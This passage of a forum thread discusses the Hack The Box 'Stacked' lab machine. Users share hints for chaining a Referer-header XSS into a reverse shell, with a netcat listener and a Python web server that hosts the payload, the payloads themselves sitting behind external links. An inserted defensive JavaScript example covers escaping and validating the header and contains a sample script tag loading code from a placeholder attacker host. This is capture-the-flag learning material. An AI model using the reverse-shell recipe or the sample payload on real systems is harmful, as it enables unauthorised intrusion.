TUTORIAL HTB Stacked [Discussion]
by pheonix2021 - September 18, 2021 at 06:09 PM
#37
(September 24, 2021 at 12:53 PM)GSSidda7 Wrote:
(September 24, 2021 at 12:38 PM)crux12 Wrote:
(September 24, 2021 at 06:55 AM)infosecsy18 Wrote: Any hint for the root part

Stuck there too........

Hint on XSS to OS command injection..?

You should give the CSRF a try; try to chain it
Reply
#38
(September 24, 2021 at 12:53 PM)GSSidda7 Wrote:
(September 24, 2021 at 12:38 PM)crux12 Wrote:
(September 24, 2021 at 06:55 AM)infosecsy18 Wrote: Any hint for the root part

Stuck there too........

Hint on XSS to OS command injection..?

stuck on privesc to root too on localstack

For the user, the mentioned SonarSource blog post and the injection on the Referer are enough.
Use the Referer XSS injection to inject a controlled JS file that can redirect the user to the dashboard.
The bot runs every 2 mins.
Reply
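For defenders, the Referer injection discussed in the post above only works if a stored header value is later rendered unescaped into a page that a privileged user or bot opens. The following is an added example, not code from the thread or from the target application; `renderRow`, `normalizeReferer` and the sample values are hypothetical, and it assumes an admin view that lists request headers.

```javascript
// Added example: handling an attacker-controlled Referer header safely.
// All names and sample values are constructed for illustration.

// Constructed sample of a hostile header value (placeholder host).
const SAMPLE_BAD = '<script src="http://attacker.invalid/x.js"></script>';

// Escape the characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept only absolute http(s) URLs with no markup, quotes, whitespace or
// control characters; everything else becomes null instead of being stored.
function normalizeReferer(raw) {
  if (typeof raw !== 'string' || raw.length > 2048) return null;
  if (/[<>"'`\s\x00-\x1f]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw);
  } catch {
    return null; // not a parseable absolute URL
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Vulnerable pattern: the header is concatenated into markup as-is, so any
// script tag in it runs in the viewer's browser session.
function renderRowUnsafe(referer) {
  return '<td>' + referer + '</td>';
}

// Hardened pattern: validate on input, escape on output.
function renderRow(referer) {
  const clean = normalizeReferer(referer);
  return '<td>' + (clean === null ? '(invalid referer)' : escapeHtml(clean)) + '</td>';
}
```

A Content-Security-Policy that disallows scripts from other origins is a useful second layer on any page that displays request metadata.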
#39
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote:
(September 23, 2021 at 06:54 PM)GSSidda7 Wrote:
(September 23, 2021 at 05:53 PM)infosecsy18 Wrote: anyone can help me to use this exploit
https://blog.sonarsource.com/hack-the-st...localstack
How to pass parameter  to /dashboard/api/

Does /dashboard/api work?


You can access the dashboard using XSS because the port of "Online Interpreter" is local

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(set IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/A8kwZOzB#+YmSmfAy...0m5wHozl+y

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (set IP)
https://0bin.net/paste/sJvuXybM#4IhYs1Ak...SMimmnwsGO

and wait for the incoming GET request to http.server and nc connection from the container.
Reply
#40
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote:
(September 23, 2021 at 06:54 PM)GSSidda7 Wrote:
(September 23, 2021 at 05:53 PM)infosecsy18 Wrote: anyone can help me to use this exploit
https://blog.sonarsource.com/hack-the-st...localstack
How to pass parameter  to /dashboard/api/

Does /dashboard/api work?


You can access the dashboard using XSS because the port of "Online Interpreter" is local

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

Hi,

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.
Any hints on root?
Reply
#41
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote:
(September 23, 2021 at 06:54 PM)GSSidda7 Wrote:
(September 23, 2021 at 05:53 PM)infosecsy18 Wrote: anyone can help me to use this exploit
https://blog.sonarsource.com/hack-the-st...localstack
How to pass parameter  to /dashboard/api/

Does /dashboard/api work?


You can access the dashboard using XSS because the port of "Online Interpreter" is local

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again?

Can't work out how to get the callback from /dashboard/api/
Reply
#42
maybe that
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:[email protected]/boltmail'
---
but not dump
mysqldump: Error: 'Access denied; you need (at least one of) the PROCESS privilege(s) for this operation' when trying to dump tablespaces
and bad try mysql-shell
---
so that is not interesting, only hash admin in one table user
---
sorry not this thread
Reply
#43
(September 26, 2021 at 09:45 PM)TDis7 Wrote:
(September 26, 2021 at 03:49 PM)Wubbadubdub Wrote:
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote: You can access the dashboard using XSS because the port of "Online Interpreter" is local

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again?

Can't work out how to get the callback from /dashboard/api/

https://0bin.net/paste/DrXy8Bt1#5kjSap7shQERQ-uxQ9pzhpayfj85mMWTW3r4W1qLRYj
it works, just change IP in the URL encoded string...

How did you find those headers?
and also those env variables
Reply
#44
I've been stuck on root for the last 3 days
plz if you know anything give me a hint :-(
Reply
#45
(September 27, 2021 at 10:57 AM)A_matin12 Wrote:
(September 26, 2021 at 09:45 PM)TDis7 Wrote:
(September 26, 2021 at 03:49 PM)Wubbadubdub Wrote:
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote: XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again?

Can't work out how to get the callback from /dashboard/api/

https://0bin.net/paste/DrXy8Bt1#5kjSap7shQERQ-uxQ9pzhpayfj85mMWTW3r4W1qLRYj
it works, just change IP in the URL encoded string...

How did you find those headers?
and also those env variables

by running the container locally & BURP & https://reqbin.com/
Reply
#46
(September 27, 2021 at 08:31 PM)TDis7 Wrote:
(September 27, 2021 at 10:57 AM)A_matin12 Wrote:
(September 26, 2021 at 09:45 PM)TDis7 Wrote:
(September 26, 2021 at 03:49 PM)Wubbadubdub Wrote:
(September 25, 2021 at 11:26 AM)TDis7 Wrote: create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again?

Can't work out how to get the callback from /dashboard/api/

https://0bin.net/paste/DrXy8Bt1#5kjSap7shQERQ-uxQ9pzhpayfj85mMWTW3r4W1qLRYj
it works, just change IP in the URL encoded string...

How did you find those headers?
and also those env variables

by running the container locally & BURP & https://reqbin.com/

Thanks!!
Reply
#47
Anyone with root? Stuck at user localstack
Reply
#48
can someone share js script for reverse shell, the link is dead
Reply
